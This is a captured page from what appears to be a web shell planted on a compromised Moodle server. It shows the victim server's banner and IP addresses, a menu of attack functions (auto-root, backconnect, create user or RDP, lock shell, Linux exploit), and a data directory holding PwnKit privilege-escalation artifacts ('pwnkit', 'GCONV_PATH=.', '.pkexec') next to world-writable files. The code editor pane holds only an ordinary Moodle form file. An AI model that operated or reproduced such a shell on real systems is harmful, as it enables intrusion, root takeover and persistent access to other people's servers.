Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
mod /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
field
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
preset
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
css.php
1.56
KB
-rwxrwxrwx
data.js
4.33
KB
-rwxrwxrwx
edit.php
11.51
KB
-rwxrwxrwx
export.php
4.1
KB
-rwxrwxrwx
export_form.php
3.43
KB
-rwxrwxrwx
field.php
13.65
KB
-rwxrwxrwx
import.php
8.24
KB
-rwxrwxrwx
import_form.php
1.26
KB
-rwxrwxrwx
index.php
4.72
KB
-rwxrwxrwx
js.php
1.56
KB
-rwxrwxrwx
lib.php
123.92
KB
-rwxrwxrwx
locallib.php
20.36
KB
-rwxrwxrwx
mod_form.php
3.51
KB
-rwxrwxrwx
preset.php
10.76
KB
-rwxrwxrwx
preset_form.php
2.9
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
4.08
KB
-rwxrwxrwx
rsslib.php
7
KB
-rwxrwxrwx
settings.php
606
B
-rwxrwxrwx
styles.css
2.28
KB
-rwxrwxrwx
tabs.php
5.24
KB
-rwxrwxrwx
templates.php
13.06
KB
-rwxrwxrwx
version.php
1.2
KB
-rwxrwxrwx
view.php
34.92
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : export_form.php
<?php if (!defined('MOODLE_INTERNAL')) { die('Direct access to this script is forbidden!'); } require_once($CFG->libdir . '/formslib.php'); require_once($CFG->libdir . '/csvlib.class.php'); class mod_data_export_form extends moodleform { var $_datafields = array(); var $_cm; var $_data; // @param string $url: the url to post to // @param array $datafields: objects in this database function mod_data_export_form($url, $datafields, $cm, $data) { $this->_datafields = $datafields; $this->_cm = $cm; $this->_data = $data; parent::moodleform($url); } function definition() { global $CFG; $mform =& $this->_form; $mform->addElement('header', 'notice', get_string('chooseexportformat', 'data')); $choices = csv_import_reader::get_delimiter_list(); $key = array_search(';', $choices); if (! $key === FALSE) { // array $choices contains the semicolon -> drop it (because its encrypted form also contains a semicolon): unset($choices[$key]); } $typesarray = array(); $typesarray[] = $mform->createElement('radio', 'exporttype', null, get_string('csvwithselecteddelimiter', 'data') . ' ', 'csv'); $typesarray[] = $mform->createElement('select', 'delimiter_name', null, $choices); //temporarily commenting out Excel export option. See MDL-19864 //$typesarray[] = $mform->createElement('radio', 'exporttype', null, get_string('excel', 'data'), 'xls'); $typesarray[] = $mform->createElement('radio', 'exporttype', null, get_string('ods', 'data'), 'ods'); $mform->addGroup($typesarray, 'exportar', '', array(''), false); $mform->addRule('exportar', null, 'required'); $mform->setDefault('exporttype', 'csv'); if (array_key_exists('cfg', $choices)) { $mform->setDefault('delimiter_name', 'cfg'); } else if (get_string('listsep', 'langconfig') == ';') { $mform->setDefault('delimiter_name', 'semicolon'); } else { $mform->setDefault('delimiter_name', 'comma'); } $mform->addElement('header', 'notice', get_string('chooseexportfields', 'data')); foreach($this->_datafields as $field) { if($field->text_export_supported()) { $mform->addElement('advcheckbox', 'field_'.$field->field->id, '<div title="' . s($field->field->description) . '">' . $field->field->name . '</div>', ' (' . $field->name() . ')', array('group'=>1)); $mform->setDefault('field_'.$field->field->id, 1); } else { $a = new stdClass(); $a->fieldtype = $field->name(); $mform->addElement('static', 'unsupported'.$field->field->id, $field->field->name, get_string('unsupportedexport', 'data', $a)); } } $this->add_checkbox_controller(1, null, null, 1); $context = context_module::instance($this->_cm->id); if (has_capability('mod/data:exportuserinfo', $context)) { $mform->addElement('checkbox', 'exportuser', get_string('includeuserdetails', 'data')); } $mform->addElement('checkbox', 'exporttime', get_string('includetime', 'data')); if ($this->_data->approval) { $mform->addElement('checkbox', 'exportapproval', get_string('includeapproval', 'data')); } $this->add_action_buttons(true, get_string('exportentries', 'data')); } }
Close